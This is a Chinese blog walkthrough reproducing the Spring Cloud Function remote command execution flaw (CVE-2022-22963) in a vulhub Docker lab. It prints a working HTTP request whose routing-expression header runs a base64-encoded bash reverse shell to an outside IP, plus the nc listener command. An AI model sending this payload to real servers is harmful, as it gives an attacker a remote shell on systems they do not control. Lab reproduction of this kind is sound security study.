当前位置: 首页 > news >正文

vulhub spring 远程命令执行漏洞(CVE-2022-22963)

news 2025/6/28 13:12:15

1.执行以下命令启动靶场环境并在浏览器访问

cd spring/CVE-2022-22963
docker-compose up -d
docker ps

2.反弹shell

构造payload

页面刷新抓包,修改内容

POST /functionRouter HTTP/1.1
Host: 192.168.0.107:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTMuMjMxLjAvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}")
Content-Type: text/plain
Content-Length: 8

test

开启监听,执行反弹

nc -lvvp 7777

放包,成功反弹,命令执行成功


http://www.mrgr.cn/news/22017.html

相关文章:

  • Popup源码分析 -- ant-design-vue系列
  • STM32(十一):ADC数模转换器实验
  • QML入门之基本元素
  • 【iOS】Masnory的简单学习
  • 业务资源管理模式语言10
  • C++ linux下的cmake
  • JAVA基础:值传递和址传递
  • anaconda3下的python编程练习-csv翻译器相关
  • STM32内部闪存FLASH(内部ROM)、IAP
  • 【牛站 / USACO2007】
  • WSL 下的 CentOS 装 Docker
  • 指针与一维数组
  • C++音视频开发笔记目录
  • 【系统架构设计师】隐式调用(事件驱动)架构
  • 从量化交易角度看,股市能做行业长期趋势的标志吗
  • 录屏新秀Top3 VS班迪录屏 ,谁更胜一筹?
  • C++——stack、queue的实现及deque的介绍
  • 【数据结构】堆——堆排序与海量TopK问题
  • 跨平台电商数据整合:item_get API在电商大数据平台中的角色
  • 魔术方法介绍